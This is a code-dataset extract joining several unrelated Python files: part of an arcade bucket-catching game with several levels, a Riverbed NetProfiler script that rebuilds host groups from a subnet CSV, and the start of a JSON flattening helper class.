        presumably assigned by level-loading code outside this chunk; confirm.
        """
        # You may want many lists. Lists for coins, monsters, etc.
        self.bucket_list = None
        self.object_list = None
        self.object_loader = None
        # This holds the background images. If you don't want changing
        # background images, you can delete this part.
        self.background = None
        self.music = None
        self.tick = 0
        # Index into bucket_list of the player-selected bucket (None = none).
        self.selected_bucket = None
        self.score = 0
        # While True, update() advances game state each frame.
        self.run = True
def update(self):
if self.run:
self.tick += 1
if self.object_loader is not None:
ret = self.object_loader.load(self.tick)
if ret is not None:
self.object_list.append(ret)
if self.bucket_list is not None:
for bucket in self.bucket_list:
bucket.update()
if self.object_list is not None:
hit_list = bucket.collides_with_list(self.object_list)
for obj in hit_list:
if bucket.score(obj):
self.score += obj.pass_val
else:
self.score += obj.fail_val
self.object_list.remove(obj)
if self.object_list is not None:
for obj in self.object_list:
obj.update()
if obj.center_y < 5:
self.score += obj.miss_val
self.object_list.remove(obj)
def draw(self):
if self.background is not None:
arcade.draw_lrwh_rectangle_textured(0, 0,
SCREEN_WIDTH, SCREEN_HEIGHT,
self.background)
if self.bucket_list is not None:
self.bucket_list.draw()
if self.object_list is not None:
self.object_list.draw()
if self.selected_bucket is not None:
arcade.draw_rectangle_outline(self.bucket_list[self.selected_bucket].center_x,
self.bucket_list[self.selected_bucket].center_y,
self.bucket_list[self.selected_bucket].height * 1.2,
self.bucket_list[self.selected_bucket].width * 1.2,
self.bucket_list[self.selected_bucket].color, (self.tick % 12) + 2, 0)
arcade.draw_text("Time Left {:d}".format(int((self.length - self.tick) / 60)), (SCREEN_WIDTH / 6) * 4,
SCREEN_HEIGHT - (SCREEN_HEIGHT / 10), arcade.color.BLACK, 60)
arcade.draw_text("Score: {}".format(self.score), 0, (SCREEN_HEIGHT / 10) * 9,
arcade.color.RED, 64)
if self.tick > self.length:
arcade.draw_text("GAME OVER", (SCREEN_WIDTH / 5) * 1, (SCREEN_HEIGHT / 6) * 3, arcade.color.BLACK, 128)
def next_bucket(self):
# print(self.selected_bucket)
if self.selected_bucket is None and len(self.bucket_list) > 0:
self.selected_bucket = 0
else:
self.selected_bucket += 1
if self.selected_bucket >= len(self.bucket_list):
self.selected_bucket = 0
# print(self.selected_bucket)
# Maybe play a sound here?
def prev_bucket(self):
# print(self.selected_bucket)
if self.selected_bucket is None and len(self.bucket_list) > 0:
self.selected_bucket = len(self.bucket_list) - 1
else:
self.selected_bucket -= 1
if self.selected_bucket < 0:
self.selected_bucket = len(self.bucket_list) - 1
def move_bucket(self, x):
if self.selected_bucket is not None:
self.bucket_list[self.selected_bucket].v_x += x
def stop_bucket(self):
if self.selected_bucket is not None:
self.bucket_list[self.selected_bucket].v_x = 0
def stop_all_buckets(self):
for x in self.bucket_list:
x.v_x = 0
def on_key_press(self, key, key_modifiers):
"""
Called whenever a key on the keyboard is pressed.
For a full list of keys, see:
http://arcade.academy/arcade.key.html
"""
if key == arcade.key.TAB:
if key_modifiers & arcade.key.MOD_SHIFT:
self.prev_bucket()
else:
self.next_bucket()
elif key == arcade.key.LEFT or key == arcade.key.A:
self.move_bucket(-1)
elif key == arcade.key.RIGHT or key == arcade.key.D:
self.move_bucket(1)
elif key == arcade.key.S:
self.stop_all_buckets()
elif key == arcade.key.SPACE:
self.stop_bucket()
elif key == arcade.key.Q:
exit(0)
def on_key_release(self, key, key_modifiers):
"""
Called whenever the user lets off a previously pressed key.
"""
if ON_KEY_RELEASE:
if key == arcade.key.LEFT:
self.move_bucket(1)
elif key == arcade.key.RIGHT:
self.move_bucket(-1)
class SpaceLevel(Level):
    """Space-themed stage: one bucket, weighted ship/poop lane spawner,
    scrolling road and edge trees."""

    def __init__(self):
        super().__init__()
        self.bucket_list = arcade.SpriteList()
        self.bucket_list.append(Bucket((255, 0, 0, 255),
                                       [IsFormCriteria(), IsColorCriteria((255, 0, 0))]))
        self.bucket_list[0].center_x = SCREEN_WIDTH / 4
        self.selected_bucket = 0
        self.object_list = arcade.SpriteList()
        self.length = 60 * 120  # two minutes at 60 ticks/second
        self.tree_tick = False  # alternates every second to stagger the edge trees
        self.background = arcade.load_texture("resources/Background-4.png")
        self.object_loader = WeightedObjectLaneLoader(60, [
            FactoryWeight(ShipFactory((255, 0, 0, 255), "R", self), range(0, 10)),
            FactoryWeight(ShipFactory((0, 255, 0, 255), "G", self), range(40, 50)),
            FactoryWeight(ShipFactory((0, 0, 255, 255), "B", self), range(50, 90)),
            FactoryWeight(PoopFactory((255, 255, 255, 255), "R"), range(95, 100))])

    def update(self):
        """Advance base logic, then once per second spawn the two edge trees."""
        super().update()
        if not self.run:
            return
        if (self.tick % 60) == 0:
            self.tree_tick = not self.tree_tick
            tree1 = Tree((255, 255, 255, 255), "Tree")
            tree1.center_x = GetLaneCenter(-1) + (-80 if self.tree_tick else 0)
            tree1.center_y = SCREEN_HEIGHT + 20
            tree2 = Tree((255, 255, 255, 255), "Tree")
            tree2.center_x = GetLaneCenter(5) + (80 if self.tree_tick else 0)
            tree2.center_y = SCREEN_HEIGHT + 20
            self.object_list.append(tree1)
            self.object_list.append(tree2)
        if self.tick > self.length:
            self.run = False

    def draw_road(self, cx, cy, sx, sy, offset):
        """Draw a grey road of size (sx, sy) centred on (cx, cy), with dashed
        lane markings shifted vertically by `offset` (animates the scroll).

        The dead local `y_pos = offset` from the original has been removed.
        """
        zx = (cx - (sx / 2))
        zy = (cy - (sy / 2))
        line_height = 64
        margin_x = 32
        lane_width = (128 + margin_x)
        arcade.draw_rectangle_filled(cx, cy, sx, sy, arcade.color.BATTLESHIP_GREY)
        num_lines = (sy / line_height) / 4
        num_lanes = (sx / lane_width) - 1
        j = 0
        while j < num_lanes:
            j += 1
            i = 0
            while i < num_lines:
                arcade.draw_rectangle_filled(zx + (j * lane_width),
                                             zy + offset + (i * line_height * 4),
                                             (margin_x / 2), line_height,
                                             arcade.color.WHITE_SMOKE)
                i += 1

    def draw(self):
        """Draw the scrolling road behind everything, then the base scene."""
        self.draw_road((SCREEN_WIDTH / 2), SCREEN_HEIGHT / 2, (160 * 5),
                       SCREEN_HEIGHT + 512, -((self.tick * 8) % 256))
        super().draw()
class CarLevel(Level):
    """Driving stage: one bucket, weighted car/poop lane spawner, scrolling road."""

    def __init__(self):
        super().__init__()
        self.bucket_list = arcade.SpriteList()
        self.bucket_list.append(Bucket((255, 0, 0, 255),
                                       [IsFormCriteria(), IsColorCriteria((255, 0, 0))]))
        self.bucket_list[0].center_x = SCREEN_WIDTH / 4
        self.selected_bucket = 0
        self.object_list = arcade.SpriteList()
        self.length = 60 * 120  # two minutes at 60 ticks/second
        self.tree_tick = False  # alternates every second to stagger the edge trees
        self.object_loader = WeightedObjectLaneLoader(60, [
            FactoryWeight(CarFactory((255, 0, 0, 255), "R"), range(0, 10)),
            FactoryWeight(CarFactory((0, 255, 0, 255), "G"), range(40, 50)),
            FactoryWeight(CarFactory((0, 0, 255, 255), "B"), range(50, 90)),
            FactoryWeight(PoopFactory((255, 255, 255, 255), "R"), range(95, 100))])

    def update(self):
        """Advance base logic, then once per second spawn the two edge trees."""
        super().update()
        if not self.run:
            return
        if (self.tick % 60) == 0:
            self.tree_tick = not self.tree_tick
            tree1 = Tree((255, 255, 255, 255), "Tree")
            tree1.center_x = GetLaneCenter(-1) + (-80 if self.tree_tick else 0)
            tree1.center_y = SCREEN_HEIGHT + 20
            tree2 = Tree((255, 255, 255, 255), "Tree")
            tree2.center_x = GetLaneCenter(5) + (80 if self.tree_tick else 0)
            tree2.center_y = SCREEN_HEIGHT + 20
            self.object_list.append(tree1)
            self.object_list.append(tree2)
        if self.tick > self.length:
            self.run = False

    def draw_road(self, cx, cy, sx, sy, offset):
        """Draw a grey road with dashed lane markings (see SpaceLevel.draw_road;
        kept duplicated to keep each class self-contained).

        The dead local `y_pos = offset` from the original has been removed.
        """
        zx = (cx - (sx / 2))
        zy = (cy - (sy / 2))
        line_height = 64
        margin_x = 32
        lane_width = (128 + margin_x)
        arcade.draw_rectangle_filled(cx, cy, sx, sy, arcade.color.BATTLESHIP_GREY)
        num_lines = (sy / line_height) / 4
        num_lanes = (sx / lane_width) - 1
        j = 0
        while j < num_lanes:
            j += 1
            i = 0
            while i < num_lines:
                arcade.draw_rectangle_filled(zx + (j * lane_width),
                                             zy + offset + (i * line_height * 4),
                                             (margin_x / 2), line_height,
                                             arcade.color.WHITE_SMOKE)
                i += 1

    def draw(self):
        """Draw the scrolling road behind everything, then the base scene."""
        self.draw_road((SCREEN_WIDTH / 2), SCREEN_HEIGHT / 2, (160 * 5),
                       SCREEN_HEIGHT + 512, -((self.tick * 8) % 256))
        super().draw()
class Level1(Level):
    """Stage 1: three single-colour buckets fed by the R/G/B cycling loader,
    drawn over a smiley-face backdrop."""

    def __init__(self):
        super().__init__()
        self.bucket_list = arcade.SpriteList()
        for rgba in ((255, 0, 0, 255), (0, 255, 0, 255), (0, 0, 255, 255)):
            self.bucket_list.append(
                Bucket(rgba, [IsFormCriteria(), IsColorCriteria(rgba[:3])]))
        for slot, bucket in enumerate(self.bucket_list, start=1):
            bucket.center_x = (SCREEN_WIDTH / 4) * slot
        self.selected_bucket = 1
        self.object_loader = RGBObjectLoader()
        self.object_list = arcade.SpriteList()
        self.length = 60 * 120

    def update(self):
        """Run base logic; stop once the stage timer expires."""
        super().update()
        if self.tick > self.length:
            self.run = False

    def draw(self):
        """Paint a smiley-face backdrop, then the standard scene on top."""
        face_x = 300
        arcade.draw_circle_filled(face_x, 300, 200, arcade.color.YELLOW)
        # Eyes: right then left, same draw order as before.
        arcade.draw_circle_filled(370, 350, 20, arcade.color.BLACK)
        arcade.draw_circle_filled(230, 350, 20, arcade.color.BLACK)
        # Smile: an arc across the lower half of the face.
        arcade.draw_arc_outline(face_x, 280, 120, 100, arcade.color.BLACK,
                                190, 350, 10)
        super().draw()
class Level2(Level):
    """Stage 2: a single magenta bucket that accepts red OR blue forms."""

    def __init__(self):
        super().__init__()
        self.bucket_list = arcade.SpriteList()
        self.bucket_list.append(Bucket((255, 0, 255, 255),
                                       [IsFormCriteria(),
                                        OrCriteria(IsColorCriteria((255, 0, 0)),
                                                   IsColorCriteria((0, 0, 255)))]))
        self.bucket_list[0].center_x = (SCREEN_WIDTH / 4) * 2
        self.selected_bucket = 0
        self.object_loader = RBPObjectLoader()
        self.object_list = arcade.SpriteList()
        self.length = 60 * 120  # two minutes at 60 ticks/second
        self.background = arcade.load_texture("resources/remodeling_an_office_bathroom.jpg")

    def update(self):
        """Run base logic; stop once the stage timer expires."""
        super().update()
        if self.tick > self.length:
            self.run = False

    # The draw() override that only delegated to super().draw() was removed;
    # the inherited Level.draw() is used directly.
class Level3(Level):
    """Stage 3: three single-colour buckets plus a magenta red-or-blue bucket."""

    def __init__(self):
        super().__init__()
        self.bucket_list = arcade.SpriteList()
        self.bucket_list.append(Bucket((255, 0, 0, 255), [IsFormCriteria(), IsColorCriteria((255, 0, 0))]))
        self.bucket_list.append(Bucket((0, 255, 0, 255), [IsFormCriteria(), IsColorCriteria((0, 255, 0))]))
        self.bucket_list.append(Bucket((0, 0, 255, 255), [IsFormCriteria(), IsColorCriteria((0, 0, 255))]))
        self.bucket_list[0].center_x = SCREEN_WIDTH / 5
        self.bucket_list[1].center_x = (SCREEN_WIDTH / 5) * 4
        self.bucket_list[2].center_x = (SCREEN_WIDTH / 5) * 3
        self.bucket_list.append(Bucket((255, 0, 255, 255),
                                       [IsFormCriteria(),
                                        OrCriteria(IsColorCriteria((255, 0, 0)),
                                                   IsColorCriteria((0, 0, 255)))]))
        self.bucket_list[3].center_x = (SCREEN_WIDTH / 5) * 2
        self.selected_bucket = 3
        self.object_loader = RGBPObjectLoader(60)
        self.object_list = arcade.SpriteList()
        self.length = 60 * 90  # ninety seconds at 60 ticks/second
        self.background = arcade.load_texture("resources/OfficeSpacePrinterScene.jpg")

    def update(self):
        """Run base logic; stop once the stage timer expires."""
        super().update()
        if self.tick > self.length:
            self.run = False

    # The draw() override that only delegated to super().draw() was removed.
class Level4(Level):
    """Stage 4: three single-colour buckets plus a red-or-blue bucket, fed by
    a weighted random spawner (forms plus occasional poop)."""

    def __init__(self):
        super().__init__()
        self.bucket_list = arcade.SpriteList()
        self.bucket_list.append(Bucket((255, 0, 0, 255), [IsFormCriteria(), IsColorCriteria((255, 0, 0))]))
        self.bucket_list.append(Bucket((0, 255, 0, 255), [IsFormCriteria(), IsColorCriteria((0, 255, 0))]))
        self.bucket_list.append(Bucket((0, 0, 255, 255), [IsFormCriteria(), IsColorCriteria((0, 0, 255))]))
        self.bucket_list.append(Bucket((255, 0, 255, 255),
                                       [IsFormCriteria(),
                                        OrCriteria(IsColorCriteria((255, 0, 0)),
                                                   IsColorCriteria((0, 0, 255)))]))
        self.bucket_list[0].center_x = SCREEN_WIDTH / 5
        self.bucket_list[1].center_x = (SCREEN_WIDTH / 5) * 4
        self.bucket_list[2].center_x = (SCREEN_WIDTH / 5) * 3
        self.bucket_list[3].center_x = (SCREEN_WIDTH / 5) * 2
        self.selected_bucket = 3
        self.object_loader = WeightedObjectLoader(60, [
            FactoryWeight(FormFactory((255, 0, 0, 255), "R"), range(0, 40)),
            FactoryWeight(FormFactory((0, 255, 0, 255), "G"), range(40, 50)),
            FactoryWeight(FormFactory((0, 0, 255, 255), "B"), range(50, 90)),
            FactoryWeight(PoopFactory((255, 255, 255, 255), "R"), range(95, 100))])
        self.object_list = arcade.SpriteList()
        self.length = 60 * 90  # ninety seconds at 60 ticks/second
        self.background = arcade.load_texture("resources/ModernOffice.jpg")

    def update(self):
        """Run base logic; stop once the stage timer expires."""
        super().update()
        if self.tick > self.length:
            self.run = False

    # The draw() override that only delegated to super().draw() was removed.
class Level5(Level):
    """Stage 5: a green bucket and a red-or-blue bucket with a slow (one per
    three seconds) weighted spawner."""

    def __init__(self):
        super().__init__()
        self.bucket_list = arcade.SpriteList()
        self.bucket_list.append(Bucket((0, 255, 0, 255), [IsFormCriteria(), IsColorCriteria((0, 255, 0))]))
        self.bucket_list.append(Bucket((255, 0, 255, 255),
                                       [IsFormCriteria(),
                                        OrCriteria(IsColorCriteria((255, 0, 0)),
                                                   IsColorCriteria((0, 0, 255)))]))
        self.bucket_list[0].center_x = SCREEN_WIDTH / 5
        self.bucket_list[1].center_x = (SCREEN_WIDTH / 5) * 4
        self.selected_bucket = 0
        self.object_loader = WeightedObjectLoader(180, [
            FactoryWeight(FormFactory((255, 0, 0, 255), "R"), range(0, 40)),
            FactoryWeight(FormFactory((0, 255, 0, 255), "G"), range(40, 50)),
            FactoryWeight(FormFactory((0, 0, 255, 255), "B"), range(50, 90)),
            FactoryWeight(PoopFactory((200, 50, 100, 255), "S"), range(95, 100))])
        self.object_list = arcade.SpriteList()
        self.length = 60 * 120  # two minutes at 60 ticks/second
        self.background = arcade.load_texture("resources/OfficeScene1.jpg")

    def update(self):
        """Run base logic; stop once the stage timer expires."""
        super().update()
        if self.tick > self.length:
            self.run = False

    # The draw() override that only delegated to super().draw() was removed.
class Bucket(arcade.Sprite):
    """A player-controlled catcher sprite.

    An object dropped into the bucket scores positively only when it
    satisfies every criterion in `criteria`.  (The original docstring was a
    copy-paste about "coins".)
    """

    def __init__(self, color, criteria):
        super().__init__("resources/trash.png", 1)
        self.criteria = criteria  # objects exposing check(other) -> bool
        self.color = color
        self.center_y = (self.height / 4) * 2  # rest near the bottom of the screen
        self.v_x = 0  # horizontal velocity, driven by Level.move_bucket

    def score(self, other):
        """Return True when `other` satisfies ALL of this bucket's criteria."""
        # all() short-circuits exactly like the original manual loop.
        return all(criterion.check(other) for criterion in self.criteria)

    def update(self):
        """Move horizontally and clamp to the screen, killing velocity at the edges."""
        self.center_x += self.v_x
        if self.center_x >= SCREEN_WIDTH:
            self.center_x = SCREEN_WIDTH - 1
            self.v_x = 0
        if self.center_x <= 0:
            self.center_x = 1
            self.v_x = 0
class FallingObject(arcade.Sprite):
    """Base sprite for anything that drops through the play field."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.v_y = DEFAULT_GRAVITY  # per-tick change in y
        self.pass_val = 100         # score when caught by a matching bucket
        self.fail_val = -100        # score when caught by a wrong bucket
        self.miss_val = -50         # score when it leaves the field uncaught
        self.type = "FallingObject"
        self.v_x = 0
        # Spawn just above the visible area at a random horizontal position.
        self.center_y = random.randrange(SCREEN_HEIGHT + 20,
                                         SCREEN_HEIGHT + 100)
        self.center_x = random.randrange(SCREEN_WIDTH)
        self.tick = 0

    def reset_pos(self):
        """Re-spawn just above the screen at a fresh random x."""
        self.center_y = random.randrange(SCREEN_HEIGHT + 20,
                                         SCREEN_HEIGHT + 100)
        self.center_x = random.randrange(SCREEN_WIDTH)

    def process_miss(self):
        """Hook invoked when the sprite drops below the screen; default re-spawns."""
        self.reset_pos()

    def update(self):
        """Advance one tick of motion, clamp x to the screen, recycle on miss."""
        self.tick += 1
        self.center_y += self.v_y
        self.center_x += self.v_x
        # The two clamp branches are mutually exclusive, so elif is equivalent.
        if self.center_x >= SCREEN_WIDTH:
            self.center_x = SCREEN_WIDTH - 1
            self.v_x = 0
        elif self.center_x <= 0:
            self.center_x = 1
            self.v_x = 0
        if self.top < 0:
            self.process_miss()
class Bullet(FallingObject):
    """A projectile fired by a Ship toward the player's selected bucket."""

    def __init__(self, color, val):
        super().__init__("resources/pencil2.png", 1)
        self.val = val
        self.color = color
        self.type = "Bullet"
        self.v_y = DEFAULT_GRAVITY * 0.5
        self.pass_val, self.fail_val, self.miss_val = 100, -200, 10

    def shootat(self, target):
        """Aim this bullet from its current position toward `target`.

        Speed is random (2-7) and the aim point is scattered +/-200 px
        around the target's centre.
        """
        speed = random.randrange(2, 8)
        aim_x = target.center_x + random.randrange(-200, 200)
        aim_y = target.center_y + random.randrange(-200, 200)
        # Angle (radians) from our position to the scattered aim point.
        heading = math.atan2(aim_y - self.center_y, aim_x - self.center_x)
        self.v_x = math.cos(heading) * speed
        self.v_y = math.sin(heading) * speed
class Ship(FallingObject):
    """An enemy ship that descends while occasionally firing at the player."""

    def __init__(self, color, val, level):
        super().__init__("resources/ships/ship_{}.png".format(random.randrange(0, 31)), 0.5)
        self.level = level  # back-reference used to target and attach bullets
        self.val = val
        self.color = color
        self.type = "Ship"
        self.v_y = DEFAULT_GRAVITY * 0.5
        self.pass_val = 100
        self.fail_val = -200
        self.miss_val = 100

    def update(self):
        """Fall as usual; once per second there is a 50% chance to fire."""
        super().update()
        if (self.tick % 60) == 0:
            if random.randrange(0, 2) == 0:
                b = Bullet((255, 255, 255, 255), self.val)
                # Position the bullet at the ship BEFORE aiming: the original
                # called shootat() first, so the trajectory was computed from
                # the bullet's random spawn point instead of the ship.
                b.center_x = self.center_x
                b.center_y = self.center_y
                b.shootat(self.level.bucket_list[self.level.selected_bucket])
                self.level.object_list.append(b)
class Car1Down(FallingObject):
    """An enemy car using the downward-facing sprite, falling at normal speed."""

    def __init__(self, color, val):
        super().__init__("resources/car-enemy2.png", 8)
        self.val = val
        self.color = color
        self.type = "Car"
        self.v_y = DEFAULT_GRAVITY
        self.pass_val, self.fail_val, self.miss_val = 100, -200, 50
class SwervingCar1Down(FallingObject):
    """A half-speed enemy car with a 5% chance per tick to start drifting right."""

    def __init__(self, color, val):
        super().__init__("resources/car-enemy2.png", 8)
        self.val = val
        self.color = color
        self.type = "Car"
        self.v_y = DEFAULT_GRAVITY * 0.5
        self.pass_val, self.fail_val, self.miss_val = 100, -200, 100

    def update(self):
        """Possibly begin swerving, then apply the normal falling motion."""
        if random.randrange(0, 100) < 5:
            self.v_x = 1  # start drifting to the right
        super().update()
class Car1Up(FallingObject):
    """An enemy car using the upward-facing sprite, falling at normal speed."""

    def __init__(self, color, val):
        super().__init__("resources/car-enemy.png", 8)
        self.val = val
        self.color = color
        self.type = "Car"
        self.v_y = DEFAULT_GRAVITY
        self.pass_val, self.fail_val, self.miss_val = 100, -200, 50
class SwervingCar1Up(FallingObject):
    """A double-speed car with a very rare chance to swerve sideways.

    NOTE(review): sprite scale is 7 here while every other car uses 8 —
    presumably intentional, but worth confirming.
    """

    def __init__(self, color, val):
        super().__init__("resources/car-enemy.png", 7)
        self.val = val
        self.color = color
        self.type = "Car"
        self.v_y = DEFAULT_GRAVITY * 2
        self.pass_val, self.fail_val, self.miss_val = 100, -200, 100

    def update(self):
        """On a 1-in-6000 roll per tick, pick a random sideways drift, then fall."""
        if random.randrange(0, 100 * 60) == 1:
            self.v_x = random.randrange(0, 6)
        super().update()
class Car2Up(FallingObject):
    """A quarter-speed car using the player-car sprite."""

    def __init__(self, color, val):
        super().__init__("resources/car-player.png", 8)
        self.val = val
        self.color = color
        self.type = "Car"
        self.v_y = DEFAULT_GRAVITY * 0.25
        self.pass_val, self.fail_val, self.miss_val = 100, -200, 50
class SwervingCar2Up(FallingObject):
    """A quarter-speed player-sprite car with an extremely rare swerve."""

    def __init__(self, color, val):
        super().__init__("resources/car-player.png", 8)
        self.val = val
        self.color = color
        self.type = "Car"
        self.v_y = DEFAULT_GRAVITY * 0.25
        self.pass_val, self.fail_val, self.miss_val = 100, -200, 100

    def update(self):
        """On a 1-in-30000 roll per tick, pick a random sideways drift, then fall."""
        if random.randrange(0, 100 * 60 * 5) == 1:
            self.v_x = random.randrange(0, 6)
        super().update()
class Tree(FallingObject):
    """Roadside scenery spawned by the driving/space levels.

    NOTE(review): type is set to "Poop" — looks like a copy-paste leftover;
    confirm nothing keys off obj.type for trees.
    """

    def __init__(self, color, val):
        super().__init__("resources/tree.png", 4)
        self.val = val
        self.color = color
        self.type = "Poop"
        self.v_y = -8  # fixed speed, independent of DEFAULT_GRAVITY
        self.pass_val, self.fail_val, self.miss_val = 100, -1500, 0
class Poop(FallingObject):
    """A hazard object: a bucket that catches it takes the -500 fail penalty.

    NOTE(review): pass_val=100 looks unreachable while all buckets include
    IsFormCriteria — confirm.
    """

    def __init__(self, color, val):
        super().__init__("resources/poo.png", 0.05)
        self.val = val
        self.color = color
        self.type = "Poop"
        self.v_y = DEFAULT_GRAVITY * 0.5
        self.pass_val, self.fail_val, self.miss_val = 100, -500, 50
class Form(FallingObject):
    """The standard catchable object (a paper form).

    Buckets match it via IsFormCriteria plus a colour criterion; the original
    docstring was a copy-paste about "coins".
    """

    def __init__(self, color, val):
        super().__init__("resources/form-icon.png", 0.5)
        self.val = val        # short tag such as "R"/"G"/"B"
        self.color = color    # RGBA tint applied by arcade.Sprite
        self.type = "Form"
        self.v_y = DEFAULT_GRAVITY  # falls at the default speed
class MyGame(arcade.Window):
    """
    Main application window: owns the arcade.Window and delegates drawing,
    updates and input to the currently active Level (or shows the
    instruction screen when no level is active).
    """

    def __init__(self, width, height, title):
        super().__init__(width, height, title)
        arcade.set_background_color(arcade.color.AMAZON)
        self.level = None  # active Level instance; None shows the help screen

    def setup(self):
        """Create sprites/levels here; levels are currently built on key press."""
        # self.level = Level1()
        pass

    def on_draw(self):
        """Render the active level, or the instruction screen when idle."""
        # Clear to the background colour before drawing the new frame.
        arcade.start_render()
        if self.level is not None:
            self.level.draw()
        else:
            arcade.draw_text(
                "Triplicate - A Falling Objects Game\nControls:\nA, Left = Move Bucket Left\nD, Right Arrow = Move Bucket Right\nTab = Next Bucket(hold shift for Prev)\nS = Stop all buckets\nSpace - Stop current bucket\n0 - Instructions\n1-7 - Select Level\n1-5 are Normal, 6 is Car, 7 is Space",
                0, 0, arcade.color.BLACK, 60)

    def on_update(self, delta_time):
        """Advance game logic by delegating to the active level."""
        if self.level is not None:
            self.level.update()

    def on_key_press(self, key, key_modifiers):
        """Handle quit and level-select hotkeys, else forward to the level."""
        if key == arcade.key.Q:  # and key_modifiers & arcade.key.MOD_CTRL:
            exit(0)
        # Dispatch table instead of the original if/elif ladder; a level is
        # still constructed only at the moment its key is pressed.
        selectors = {
            arcade.key.KEY_0: lambda: None,
            arcade.key.KEY_1: Level1,
            arcade.key.KEY_2: Level2,
            arcade.key.KEY_3: Level3,
            arcade.key.KEY_4: Level4,
            arcade.key.KEY_5: Level5,
            arcade.key.KEY_6: CarLevel,
            arcade.key.KEY_7: SpaceLevel,
        }
        if key in selectors:
            self.level = selectors[key]()
        elif self.level is not None:
            self.level.on_key_press(key, key_modifiers)

    def on_key_release(self, key, key_modifiers):
        """Forward key releases to the active level."""
        if self.level is not None:
            self.level.on_key_release(key, key_modifiers)

    def on_mouse_motion(self, x, y, delta_x, delta_y):
        """Mouse movement is unused."""
        pass

    def on_mouse_press(self, x, y, button, key_modifiers):
        """Mouse presses are unused."""
        pass

    def on_mouse_release(self, x, y, button, key_modifiers):
        """Mouse releases are unused."""
        pass
def main():
    """Create the game window and hand control to the arcade event loop."""
    window = MyGame(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE)
    window.setup()
    arcade.run()


if __name__ == "__main__":
    main()
| StarcoderdataPython |
24095 | #!/usr/bin/env python
# Copyright (c) 2019 Riverbed Technology, Inc.
#
# This software is licensed under the terms and conditions of the MIT License
# accompanying the software ("License"). This software is distributed "AS IS"
# as set forth in the License.
import csv
import sys
import string
import optparse
from collections import defaultdict
from steelscript.netprofiler.core.app import NetProfilerApp
from steelscript.netprofiler.core.hostgroup import HostGroupType, HostGroup
from steelscript.commands.steel import prompt_yn
from steelscript.common.exceptions import RvbdException
# This script will take a file with subnets and SiteNames
# and create a HostGroupType on the target NetProfiler.
# If the HostGroupType already exists, it will be deleted,
# before creating a new one with the same name.
#
# See the EXAMPLE text below for the format of the input
# file. Note that multiple SiteNames with different
# IP address spaces can be included.
EXAMPLE_WARN = """
Invalid file format
Ensure file has correct header.
example file:
subnet SiteName
10.143.58.64/26 CZ-Prague-HG
10.194.32.0/23 MX-SantaFe-HG
10.170.55.0/24 KR-Seoul-HG
10.234.9.0/24 ID-Surabaya-HG
10.143.58.63/23 CZ-Prague-HG
"""
class HostGroupImport(NetProfilerApp):
    """CLI app that (re)creates a NetProfiler HostGroupType from a CSV file.

    The input file must carry a 'subnet SiteName' header (see EXAMPLE_WARN);
    any existing host group type with the requested name is cleared before
    the new definition is saved.
    """

    def add_options(self, parser):
        """Register the --hostgroup and -i/--input-file options."""
        super(HostGroupImport, self).add_options(parser)
        group = optparse.OptionGroup(parser, "HostGroup Options")
        group.add_option('--hostgroup', action='store',
                         help='Name of hostgroup to overwrite')
        group.add_option('-i', '--input-file', action='store',
                         help='File path to hostgroup file')
        parser.add_option_group(group)

    def validate_args(self):
        """Ensure all arguments are present."""
        super(HostGroupImport, self).validate_args()
        if not self.options.input_file:
            self.parser.error('Host group file is required, specify with '
                              '"-i" or "--input-file"')
        if not self.options.hostgroup:
            self.parser.error('Hostgroup name is required, specify with '
                              '"--hostgroup"')

    def validate(self, name):
        """Return True when `name` uses only letters, digits, '.', '-' and '_'."""
        # string.letters is Python-2-only; ascii_letters exists on both 2 and 3.
        valid = set(string.ascii_letters + string.digits + '.-_')
        return all(c in valid for c in name)

    def import_file(self):
        """Parse the input CSV and return {group_name: [cidr, ...]}.

        Exits the process on a malformed header or an invalid group name.
        """
        groups = defaultdict(list)
        # NOTE(review): binary mode is the Python 2 csv idiom; under Python 3
        # this should be text mode with newline='' — confirm the supported
        # interpreter before changing.
        with open(self.options.input_file, 'rb') as f:
            dialect = csv.Sniffer().sniff(f.read(1024))
            f.seek(0)
            reader = csv.reader(f, dialect)
            header = next(reader)  # was reader.next(), which is Python-2-only
            if header != ['subnet', 'SiteName']:
                print(EXAMPLE_WARN)
                # Abort on a bad header; the original printed the warning and
                # then kept parsing anyway.
                sys.exit()
            for i, row in enumerate(reader):
                cidr, group = row
                if not self.validate(group):
                    print('Invalid group name on line {0}: {1}'
                          ''.format(i + 2, group))
                    sys.exit()
                groups[group].append(cidr)
        return groups

    def update_hostgroups(self, groups):
        """Replace existing HostGroupType with contents of groups dict."""
        # First find any existing HostGroupType and clear it.
        try:
            hgtype = HostGroupType.find_by_name(self.netprofiler,
                                                self.options.hostgroup)
            hgtype.config = []
            hgtype.groups = {}
            print('Existing HostGroupType "{0}" found.'
                  ''.format(self.options.hostgroup))
        except RvbdException:
            print('No existing HostGroupType found, creating a new one.')
            hgtype = HostGroupType.create(self.netprofiler,
                                          self.options.hostgroup)
        # Add the new group -> CIDR mappings.
        for group, cidrs in groups.items():
            hg = HostGroup(hgtype, group)
            hg.add(cidrs)
        # Save to NetProfiler.
        hgtype.save()
        print('HostGroupType "%s" configuration saved.'
              % self.options.hostgroup)

    def main(self):
        """Confirm overwrite then update hostgroups."""
        confirm = ('The contents of hostgroup {0} will be overwritten '
                   'by the file {1}, are you sure?'
                   ''.format(self.options.hostgroup, self.options.input_file))
        if not prompt_yn(confirm):
            print('Okay, aborting.')
            sys.exit()
        groups = self.import_file()
        self.update_hostgroups(groups)
        print('Successfully updated {0} on {1}'.format(self.options.hostgroup,
                                                       self.netprofiler.host))
# Script entry point: build and run the CLI application.
if __name__ == '__main__':
    HostGroupImport().run()
| StarcoderdataPython |
121166 | <filename>pyeasytd/entries/json_easy.py
from .__init__ import *
class JsonEasyEntry:
    """Entity wrapper for a JSON document.

    Flattens arbitrarily nested JSON (lazily, on first read) so values can be
    looked up by key, optionally restricted to a nesting level.  Level 0 is
    the document root.
    """

    __level_prefix = 'level_'   # key prefix naming each nesting level in __struct
    __init_load_status = False  # True once the document has been flattened
    __json = None               # the parsed document (dict/list/tuple)
    __json_text = None          # the document as a JSON string
    __struct = None             # {level_key: {key: [values in occurrence order]}}
    __count = None              # {level_key: {key: number of occurrences}}

    def __init__(self, data):
        """Accept a JSON string, bytes/bytearray, or a dict/list/tuple.

        The original only parsed `str` here although its annotation also
        advertised bytes/bytearray; those inputs silently produced a broken
        object.
        """
        import json
        if isinstance(data, (str, bytes, bytearray)):
            self.__json = json.loads(data)
